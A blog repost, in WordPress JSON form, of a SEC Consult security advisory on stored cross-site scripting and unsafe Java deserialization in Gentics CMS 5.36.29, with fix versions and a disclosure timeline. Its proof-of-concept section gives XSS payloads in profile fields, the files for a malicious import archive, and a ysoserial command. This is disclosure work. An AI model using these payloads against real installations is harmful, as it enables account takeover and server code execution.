{"id":25961,"date":"2022-06-20T20:19:42","date_gmt":"2022-06-20T16:19:42","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/167537\/SA-20220608-0.txt"},"modified":"2022-06-26T08:46:37","modified_gmt":"2022-06-26T04:16:37","slug":"gentics-cms-5-36-29-cross-site-scripting-deserialization","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/gentics-cms-5-36-29-cross-site-scripting-deserialization\/","title":{"rendered":"Gentics CMS 5.36.29 Cross Site Scripting \/ Deserialization"},"content":{"rendered":"

SEC Consult Vulnerability Lab Security Advisory < 20220608-0 >
\n=======================================================================
\ntitle: Stored Cross-Site Scripting & Unsafe Java Deserializiation
\nproduct: Gentics CMS
\nvulnerable version: 5.36.29, see section below
\nfixed version: 5.40.27, 5.41.15, 5.42.7, 5.43.1 or higher
\nCVE number: CVE-2022-30981, CVE-2022-30982
\nimpact: high
\nhomepage: https:\/\/www.gentics.com\/
\nfound: 2021-04-02
\nby: Gerhard Hechenberger (Office Vienna)
\nSteffen Robertz (Office Vienna)
\nSEC Consult Vulnerability Lab<\/p>\n

An integrated part of SEC Consult, an Atos company
\nEurope | Asia | North America<\/p>\n

https:\/\/www.sec-consult.com<\/p>\n

=======================================================================<\/p>\n

Vendor description:
\n——————-
\n“APA-IT Informations Technologie GmbH offers offers support with a focus on
\nmedia solutions and IT-outsourcing. As a subsidiary of APA \u2013 Austria Press
\nAgency, we are responsible for the IT of the Austrian news agency as well
\nas numerous other media enterprises.
\nThis expertise and insight into the industry make APA-IT an expert for IT
\nsolutions for publishers and media-related companies. Existing systems and
\ntools are constantly developed and tailored to individual customer needs.
\nAs such, APA-IT is always available \u2013 from conception to operation.”<\/p>\n

Source: https:\/\/www.gentics.com\/genticscms\/company_gentics.en.html<\/p>\n

Business recommendation:
\n————————
\nThe vendor provides a patch which should be installed immediately.<\/p>\n

SEC Consult recommends to perform a thorough security review of these products
\nconducted by security professionals to identify and resolve all security
\nissues.<\/p>\n

Vulnerability overview\/description:
\n———————————–
\n1) Multiple Stored Cross-Site Scripting Vulnerabilities (CVE-2022-30982)
\nMultiple cross-site scripting vulnerabilities are present in the application.
\nAn attacker can store malicious JavaScript code in the username and profile
\ndescription. The code will execute once an admin user hovers over the
\nattacker’s username. Thus, the attacker can execute code in the context of an
\nadmin.<\/p>\n

2) Unsafe Java Deserialization (CVE-2022-30981)
\nThe Gentics CMS has an import option which will accept ZIP files. The archive
\nincludes a Java serialized object that gets deserialized on import. This can
\nlead to code execution on the server.
\nA low privileged user might be able to exploit this vulnerability by chaining
\nit together with vulnerability 1).<\/p>\n

Proof of concept:
\n—————–
\n1) Multiple Stored Cross-Site Scripting Vulnerabilities (CVE-2022-30982)
\nTo trigger the first XSS, an attacker has to change the profile description to
\ninclude a payload, e.g. “<script>alert(document.domain)<\/script)”. The payload
\nwill execute once a user with access to the userlist hovers his mouse over the
\nprofile name. The event “onmouseover” will trigger following code:<\/p>\n

JSI3_comp_list_401__ass( this, ‘Properties’, ‘<b>Malicious User Name<\/b><br>
\n<script>alert(document.domain)<\/script><br><br>created:<br> 09\/20\/2002
\n( Gentics Support)<br>last edited:<br>15:56 (Malicious Username)’, ” );<\/p>\n

The execution of the code leads to following function:<\/p>\n

function JSI3_comp_list_401__ass( obj, title, text, assTitle )
\n{
\nJSI3_comp_list_401__assReset();
\nclearTimeout( JSI3_comp_list_401___ass_timeout );
\nJSI3_comp_list_401__ass_show_row( obj, title, text, assTitle );
\n}<\/p>\n

The malicious code, which is contained in the “text” parameter, gets passed
\nthrough to the next function. There it is added to an HTML element and thus
\nexecuted in the browser.<\/p>\n

function JSI3_comp_list_401__ass_show_row( obj, title, text, assTitle ) {
\nif (!JSI3_comp_list_401__ass_show_row_tipsy[obj.id]) {
\nJSI3_comp_list_401__ass_show_row_tipsy[obj.id] = true;
\n$(obj).attr(‘title’, ‘<h6>’+title+'<\/h6>’+text+((assTitle)?'<br>’+assTitle:”));
\n$(obj).tipsy({
\ntrigger: ‘manual’,
\nhtml: true,
\noffset: 3,
\ndelayIn: 900,
\ndelayOut: 0,
\nopacity: 0.85,
\ngravity: ‘nww’
\n});
\n}
\n$(obj).tipsy(“show”);
\ngcn_active_tipsy = obj;
\n}<\/p>\n

Another XSS vector can be found in the parameters “First Name” and “Last Name”.
\nBy e.g. changing the last name to ‘Node” onload=”alert(document.domain)’,
\nJavaScript code is added to the profile picture that is loaded in the upper
\nright corner on every page. The following snippet shows the vulnerable line of
\ncode:<\/p>\n

<div id=”profil”>
\n<div><img src=”?do=11&module=system&img=profile_man.png” title=”Admin Node” onload=”alert(document.domain)” class=”profile_avatar”><\/div><\/p>\n

The third XSS is caused by changing the first and last name into JavaScript
\ncode without prior encoding. Changing the last name to
\n“Last Name’+eval(alert(document.domain))+'” will cause the following code to be
\nincluded in the server’s response:<\/p>\n

<script language=”JavaScript” type=”text\/javascript”>
\nvar menus = new Array();
\nvar imgs = new Array();
\nmenus[‘Admin Last Name’+eval(alert(document.domain))+”] = new Array();
\nmenus[‘Admin Last Name’+eval(alert(document.domain))+”][‘layer_pos’] = 1;
\nmenus[‘Admin Last Name’+eval(alert(document.domain))+”][‘align’] = ‘r’;<\/p>\n

2) Unsafe Java Deserialization (CVE-2022-30981)
\nFirst, a malicious ZIP archive needs to be created. The following files will need to
\nbe included within this archive:<\/p>\n

bundlebuild.xml:<\/p>\n

<?xml version=”1.0″ encoding=”UTF-8″?>
\n<bundlebuild>
\n<bundleinfo>
\n<name><![CDATA[test4]]><\/name>
\n<sourcehost><![CDATA[b1d80757b76c]]><\/sourcehost>
\n<description><![CDATA[]]><\/description>
\n<globalid>9d6243ab-a281-11eb-9ae3-0242ac130004<\/globalid>
\n<globalprefix>D77D<\/globalprefix>
\n<\/bundleinfo>
\n<builds>
\n<build>
\n<builddate>1618996405<\/builddate>
\n<changelog><![CDATA[test4]]><\/changelog>
\n<count>0<\/count>
\n<\/build>
\n<\/builds>
\n<tables>
\n<\/tables>
\n<\/bundlebuild><\/p>\n

containedobjects.xml:<\/p>\n

<?xml version=”1.0″ encoding=”UTF-8″?>
\n<objects>
\n<\/objects><\/p>\n

The third file has to be named “serializedjava.bin” and contains the actual
\npayload. A demo payload can be generated with following command:
\n$ ysoserial FileUpload1 ‘write;\/tmp;SECTEST’ > serializedjava.bin<\/p>\n

Those three files have to be zipped together into an archive, which can be
\nuploaded.<\/p>\n

The import feature is available under Enterprise CMS -> Administration ->
\nImport and Export. Now select New->Import and upload the malicious ZIP archive.
\nWait until the import completed. Now click on “Test succeeded” in the file
\nlist. On the new screen select “Start import in background”. The payload should
\ncreate a file called “upload_<random_uuid>.tmp” in the folder \/tmp. It will
\ncontain the string “SECTEST”.
\nBetter deserialization chains could be built to reach more interesting targets.
\nIt is very likely, that RCE could be obtained by writing an own deserialization
\nchain.<\/p>\n

Vulnerable \/ tested versions:
\n—————————–
\nThe following product version has been tested and found to be vulnerable. Other versions
\nare vulnerable as well, please see the vendor’s changelog in the solution section.<\/p>\n

* Gentics CMS 5.36.29<\/p>\n

Vendor contact timeline:
\n————————
\n2022-04-04: Contacting vendor through support@gentics.com
\n2022-04-04: Ticket SUP-13323 created.
\n2022-04-05: Sent advisory via unencrypted email to provided vendor email address.
\n2022-05-04: Updates for Gentics CMS were released on 14th April.
\n2022-05-05: Gentics provides us with the fixed version numbers.
\n2022-06-08: Release of security advisory.<\/p>\n

Solution:
\n———
\nUpdate to versions greater or equal to:
\n* 5.40.27 (see https:\/\/gentics.com\/Content.Node\/changelog\/5.40.0\/5.40.27.html)
\n* 5.41.15 (see https:\/\/gentics.com\/Content.Node\/changelog\/5.41.0\/5.41.15.html)
\n* 5.42.7 (see https:\/\/gentics.com\/Content.Node\/changelog\/5.42.0\/5.42.7.html)
\n* 5.43.1 (see https:\/\/gentics.com\/Content.Node\/changelog\/5.43.0\/5.43.1.html)<\/p>\n

Workaround:
\n———–
\nNone<\/p>\n

Advisory URL:
\n————-
\nhttps:\/\/sec-consult.com\/vulnerability-lab\/<\/p>\n

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<\/p>\n

SEC Consult Vulnerability Lab<\/p>\n

SEC Consult, an Atos company
\nEurope | Asia | North America<\/p>\n

About SEC Consult Vulnerability Lab
\nThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
\nAtos company. It ensures the continued knowledge gain of SEC Consult in the
\nfield of network and application security to stay ahead of the attacker. The
\nSEC Consult Vulnerability Lab supports high-quality penetration testing and
\nthe evaluation of new offensive and defensive technologies for our customers.
\nHence our customers obtain the most current information about vulnerabilities
\nand valid recommendation about the risk profile of new technologies.<\/p>\n

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
\nInterested to work with the experts of SEC Consult?
\nSend us your application https:\/\/sec-consult.com\/career\/<\/p>\n

Interested in improving your cyber security with the experts of SEC Consult?
\nContact our local offices https:\/\/sec-consult.com\/contact\/
\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<\/p>\n

Mail: security-research at sec-consult dot com
\nWeb: https:\/\/www.sec-consult.com
\nBlog: http:\/\/blog.sec-consult.com
\nTwitter: https:\/\/twitter.com\/sec_consult<\/p>\n

EOF Gerhard Hechenberger, Steffen Robertz \/ @2022<\/p>\n","protected":false},"excerpt":{"rendered":"

SEC Consult Vulnerability Lab Security Advisory < 20220608-0 > ======================================================================= title: Stored Cross-Site Scripting & Unsafe Java Deserializiation product: Gentics CMS vulnerable version: 5.36.29, see section below fixed version: 5.40.27, 5.41.15, 5.42.7, 5.43.1 or higher CVE number: CVE-2022-30981, CVE-2022-30982 impact: high homepage: https:\/\/www.gentics.com\/ found: 2021-04-02 by: Gerhard Hechenberger (Office Vienna) Steffen Robertz (Office Vienna) SEC …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-25961","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/25961","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=25961"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/25961\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=25961"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=25961"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=25961"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}